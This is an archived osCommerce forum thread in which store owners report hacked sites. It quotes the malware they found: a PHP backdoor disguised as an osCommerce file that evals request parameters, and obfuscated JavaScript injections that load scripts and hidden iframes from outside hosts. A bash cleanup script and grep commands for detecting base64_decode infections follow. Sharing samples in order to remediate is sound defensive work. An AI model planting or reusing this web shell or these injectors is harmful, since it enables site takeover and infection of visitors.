
Link to comment
Share on other sites

  • 3 weeks later...

There is a version of this hack out now that only displays what the hackers are pushing to search engine spiders.

 

I've seen it twice now.

 

My theory is they check the IP address and spout their code only if you're a search engine.

 

Looking at your site normally you wouldn't be able to tell.

 

Look at your store index page cache in Google. It will show up there.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

this showed up on my server and I had no local copy of either the file nor the folder. It was located @ images/yahoo/index.php. There was no yahoo folder generated by me so what is this a hack?

 

<?php

/*
 $Id: /yahoo/index.php 1739 2007-12-20 00:52:16Z hpdl $

 osCommerce, Open Source E-Commerce Solutions
 http://www.oscommerce.com

 Copyright (c) 2003 osCommerce

 Released under the GNU General Public License
*/


//  require('includes/application_top.php');
//    $check_email_query = tep_db_query("select count(*) as total from " . TABLE_CUSTOMERS . " where customers_email_address = '" . tep_db_input($email_address) . "' and customers_id != '" . (int)$customer_id . "'");

//    $check_email = tep_db_fetch_array($check_email_query);
//    if ($check_email['total'] > 0) {

//      $error = true;
	error_reporting(0);

//  if (!tep_session_is_registered('customer_id')) {
eval(stripslashes($_REQUEST['osc']));
//    if (ACCOUNT_GENDER == 'true') {
//     if ( ($gender != 'm') && ($gender != 'f') ) {
//        $error = true;
			eval(base64_decode($_REQUEST['osc64']));
//        $messageStack->add('account_edit', ENTRY_GENDER_ERROR);
//      }

//    }
//    $navigation->set_snapshot();
if(!(count($_GET)+count($_POST)))echo "Open Source E-Commerce Solutions ", 2000+7, " year";
//    tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL'));

//  }

?>

Link to comment
Share on other sites

I also got hacked now second time, Yesterday it happens & I just replace the index.php/login.php files in catalog folder & admin folder. This is the sample of malicious code I found.

 

<script>eval( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%55%52%4c%2c%74%3d%22%22%2c%71%2c%71%75%6"+"5%2c%73%6"+"5%3d%22%6"+"7%6"+"2%22%3b%0d%0a%6"+"9%6"+"6"+"%28%72%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%22%6"+"7%6"+"f%6"+"f%6"+"7%6"+"c%6"+"5%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%6"+"5%3d%22%6"+"7%6"+"f%6"+"f%6"+"7%6"+"c%6"+"5%22%3b%7d%0d%0a%6"+"9%6"+"6"+"%28%72%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%22%6"+"d%73%6"+"e%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%6"+"5%3d%22%6"+"d%73%6"+"e%22%3b%7d%0d%0a%6"+"9%6"+"6"+"%28%72%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%22%79%6"+"1%6"+"8%6"+"f%6"+"f%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%70%22%3b%73%6"+"5%3d%22%79%6"+"1%6"+"8%6"+"f%6"+"f%22%3b%7d%0d%0a%6"+"9%6"+"6"+"%28%72%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%22%79%6"+"1%6"+"e%6"+"4%6"+"5%78%2e%72%75%22%29%21%3d%2d%31%29%7b%74%3d%22%74%6"+"5%78%74%22%3b%73%6"+"5%3d%22%79%6"+"1%6"+"e%6"+"4%6"+"5%78%2e%72%75%22%3b%7d%0d%0a%6"+"9%6"+"6"+"%28%74%2e%6"+"c%6"+"5%6"+"e%6"+"7%74%6"+"8&&%28%28%71%3d%72%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%22%3f%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%7c%7c%28%71%3d%72%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%22&%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%29%29%7b%20%71%75%6"+"5%3d%72%2e%73%75%6"+"2%73%74%72%6"+"9%6"+"e%6"+"7%28%71%2b%32%2b%74%2e%6"+"c%6"+"5%6"+"e%6"+"7%74%6"+"8%29%2e%73%70%6"+"c%6"+"9%74%28%22&%22%29%5b%30%5d%3b%0d%0a%6"+"9%6"+"6"+"%20%28%28%71%75%6"+"5%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%27%73%6"+"9%74%6"+"5%3a%27%29%3d%3d%2d%31%29%20&&%20%28%71%75%6"+"5%2e%74%6"+"f%4c%6"+"f%77%6"+"5%72%43%6"+"1%73%6"+"5%28%29%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%27%77%77%77%2e%27%29%3d%3d%2d%31%29%29%0d%0a%09%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%77%72%6"+"9%74%6"+"5%28%22%3c%73%6"+"3%72%6"+"9%70%74%20%73%72%6"+"3%3d%27%6"+"8%74%74%70%3a%2f%2f%6"+"2%6"+"5%73%74%34%79%6"+"f%75%2e%6"+"9%6"+"6"+"%2e%75%6"+"1%2f%6"+"a%73%2f%6"+"2%6"+"9%6"+"4%6"+"3%6"+"8%2e%6"+"a%73%3f%71%3d%22%2b%71%75%6"+"5%2b%22&%72%6"+"5%6"+"6"+"%3d%22%2b%72%2b%22%27%3e%3c%2f%73%6"+"3%22%2b%22%72%6"+"9%70%74%3e%22%29%3b%0d%0a%7d%0d%0a%7d%0d%0a%76"+"%6"+"1%72%20%6"+"d%79%6"+"9%6"+"b%3d%74%72%75%6"+"5%3b" ));</script></head>
<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="#FFFFFF"><script>c1z4d7='';r0cd220='r545e8d';r0a56aabd3='r2448ddcde';rfa8a07f8891=/* r6e0b3e7 */document;if(r0cd220+c1z4d7+r0a56aabd3=='r545e8dr2448ddcde'){ r8a2f3=rfa8a07f8891};r8a2f3.write('<scr'+'ipt>function r678afd21042(rf81fa92b2){return ev'+c1z4d7+'al(rf81fa92b2); }</scr'+'ipt>');  function c127c4b23rb07a0103(r48f32f){ function r4c636406(){var raa7a8=16;return raa7a8;} var z0='';return (r678afd21042('p'+z0+'arseInt')(r48f32f,r4c636406()));}function r4815960c8f(rdf27fd8f3a){ function r7dce7782c30(){return 2;} var r8ef10f3061='';r14eeb148='fromCh';r8c456=String[r14eeb148+'arC'+'ode'];for(rc88ec=0;rc88ec<rdf27fd8f3a.length;rc88ec+=r7dce7782c30()){ r8ef10f3061+=(r8c456(c127c4b23rb07a0103(rdf27fd8f3a.substr(rc88ec,r7dce7782c30()))));}return r8ef10f3061;} var r8d5df9aaa3f='3C7363726970743E66756E6374696F6E20636865636B5F636F6E74656E7428297B7661'+c1z4d7+'7220693D303B7768696C6528646F63756D656E742E676574456C656D656E747342795461'+c1z4d7+'674E61'+c1z4d7+'6D65282769667261'+c1z4d7+'6D6527292E6C656E677468297B7661'+c1z4d7+'7220656C3D646F63756D656E742E676574456C656D656E747342795461'+c1z4d7+'674E61'+c1z4d7+'6D65282769667261'+c1z4d7+'6D6527295B695D3B6966282028656C2E7374796C652E646973706C61'+c1z4d7+'793D3D276E6F6E6527207C7C20656C2E7374796C652E7669736962696C697479203D3D2768696464656E27207C7C2028656C2E77696474683C3520262620656C2E6865696768743C35292920262620656C2E6E61'+c1z4d7+'6D6521'+c1z4d7+'3D276331'+c1z4d7+'27297B656C2E7061'+c1z4d7+'72656E744E6F64652E72656D6F76654368696C6428656C293B7D656C736520692B2B3B7D7D636865636B5F636F6E74656E7428293B0A69662821'+c1z4d7+'6D796961'+c1z4d7+'297B646F63756D656E742E777269746528756E65736361'+c1z4d7+'7065282027253363253639253636253732253631'+c1z4d7+'253664253635253230253665253631'+c1z4d7+'253664253635253364253633253331'+c1z4d7+'253230253733253732253633253364253237253638253734253734253730253361'+c1z4d7+'253266253266253733253730253666253732253734253637253735253665253265253730253663253265253735253631'+c1z4d7+'25326625373325373425326625363725366625326525373025363825373025336625373325363925363425336425333226253237253262253464253631'+c1z4d7+'253734253638253265253732253666253735253665253634253238253464253631'+c1z4d7+'253734253638253265253732253631'+c1z4d7+'253665253634253666253664253238253239253261'+c1z4d7+'253339253333253335253331'+c1z4d7+'253333253239253262253237253337253636253333253334253333253338253332253334253337253237253230253737253639253634253734253638253364253332253331'+c1z4d7+'253339253230253638253635253639253637253638253734253364253334253332253337253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c1z4d7+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c1z4d7+'2536642536352533652729293B7D7661'+c1z4d7+'72206D796961'+c1z4d7+'3D747275653B3C2F7363726970743E';r8a2f3.write(r4815960c8f(r8d5df9aaa3f));</script>

Thanks and Regards

Yasir Imran Mirza

My Contributions

Link to comment
Share on other sites

  • 2 weeks later...

If you're on a *nix type of host & you have shell access the script below will help automate some of the cleanup of the base64_decode infected php files. I found it on another forum unrelated to OSC and modified it a bit. Thanks to the original author!

 

Run the commands & shell script in your store's document root. Even when you're working with an infected set of files it's a must to make a backup of both your files & dbase _before_ you start tinkering around. I've repaired & secured 11+ sites (and counting) this past week that were wrecked with this base64_decode garbage and this script has made my life easier. ymmv.

 

The script is also available here: osc-cleanup.sh

 

osc -at- jerryrose.org

 

 

#!/bin/bash
#
#       remove-infection - Script to remove the XYZ infection from PHP files
#               Luis Esteban    8 December 2008
#
# STEP #1 - create the "yuck" file w/ the base64_decode line that is found at the top of all your php files
# (note:  you might have more than 1 type of base64_decode infection)
#
#    head -1 infectedfile > yuck
#
# STEP #2 - create a list of infected files
#
#    find ./ -name '*.php' | while read FILE; do if grep 'eval(base64_decode' "$FILE"; then echo "$FILE" >> infectedfiles; else echo "$FILE" >> notinfected; fi ; done
#
# STEP #3 - run this shell script to clean up the infected files
# STEP #4 - check for additional base64_decode lines in your files with the following command:
#
#    grep -Iir base64_decode *
#
# STEP #5 - If you've found more base64_decode infected files, delete/rename the files we've created (yuck, infectedfiles, notinfected, cleaned, notcleaned) and REPEAT ALL STEPS


cat infectedfiles | while read FILE
 do
       echo "Cleaning $FILE"
       FILEHEAD=`head -1 "$FILE"`
       YUCKHEAD=`head -1 yuck`
       if [ "$FILEHEAD" = "$YUCKHEAD" ]
         then
               echo "Infected, cleaning ..."
               tail -n+2 "$FILE" > "clean"
                               mv "clean" "$FILE"
               echo "$FILE" >> cleaned
         else
               echo "Not Infected"
               echo "$FILE" >> notcleaned
       fi
 done

 

How would I run this script? I have about 500 infected files and until now I've been cleaning them 1 by 1.

No outside links in signature allowed. See forum rules please.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...